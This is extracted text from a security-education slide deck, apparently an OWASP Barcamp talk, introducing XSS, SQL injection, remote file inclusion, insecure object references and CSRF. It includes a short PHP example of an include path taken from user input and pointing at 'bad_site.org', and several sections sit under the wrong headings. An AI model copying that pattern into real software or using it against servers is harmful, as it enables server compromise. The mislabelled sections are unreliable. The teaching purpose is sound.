Owasp Hacker Secrets Barcamp

Hacker’s SecretsHacker’s SecretsSharmishtha [email protected]

AgendaAgendaWhat is OWASP?Web security vs Network securityOWASP Top 5

◦XSS◦Sql Injection◦Malicious File Execution◦Insecure Direct Object Reference◦Cross Site Request Forgery (CSRF)

What is OWASP?What is OWASP?Web security vs Network securityWeb security vs Network security

OWASP Top 5OWASP Top 5

Open Web Application Security Project

Mission: An open community focused on web application security



Global Community

Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore

Open source projects and tools to improve web application security

Open learning resources and forum on web security



Attacker Web Server

Network Security

• Challenge is to restrict access to network and network resources (servers)• To protect data being exchanged over network from eavesdroppers• Mostly network layer stuff (packet filtering, firewalls etc)

What is OWASP? What is OWASP? Web security vs Network securityWeb security vs Network security


Compromised Web Server Victim

Web Security

• Network is already accessible on port 80 (or other webserver port)

• Challenge is to protect other network resources which are not exposed, e.g. information stored in db, other backend information



Top 5 webapp vulnerabilities◦XSS◦Sql Injection◦Malicious File Execution◦Insecure Direct Object Reference◦Cross Site Request Forgery (CSRF)

XSSXSSSql InjectionSql Injection

Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference

Cross Site Request Forgery (CSRFCross Site Request Forgery (CSRF))

When user provided data is used without validation and/or encoding

An attacker can execute a script in victim’s browser and hijack important user information without her knowing

Ex: Alice sends a scrap to Bob on Orkut with a scriptlet. When Bob opens his scrapbook, everyone in his

network is sent spam scraps posing as Bob by the scriptlet.



Cross Site Request Forgery (CSRFCross Site Request Forgery (CSRF))

A real example is “Samy worm” on MySpace.com discovered in October, 2005http://namb.la/popular/tech.ht

mlDemo



Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)

When user provided data is sent to an interpreter (here sql) as part of a command or query

An attacker can trick the interpreter into executing unintended commands or changing data

Demo




When user provided input is used for executing a remote code or loading local files

Allows attackers to include hostile code and data; can totally compromise the server




Most common sources of code injection are:◦ Dynamic paths/files used in require/include

statements◦ eval(): A major source of code injection is

the improper validation of eval() using user provided inputs.




<?php//dynamic path$_GET['path'] =

‘http://bad_site.org’;include

"$_GET[‘path’]/header.inc"; ?>




If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter

Attackers can manipulate those references to access other objects without authorization




Poor error handling is the main cause

Demos◦ Bad file inclusion◦ Sql connect failure




An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application

This can be as powerful as the web application that it attacks




Mostly when source of request is not validated

Gmail change password CSRF vulnerability disclosed by Vicente on 3rd Mar 2009◦ http://seclists.org/fulldisclosure/200

9/Mar/0029.htmlDemo

VisitVisitWebgoat from OWASP

◦Good to solve the puzzles by learning vulnerabilities

◦Good hints and solutions◦Download from

http://code.google.com/p/webgoat/downloads/list

Education

Owasp Hacker Secrets Barcamp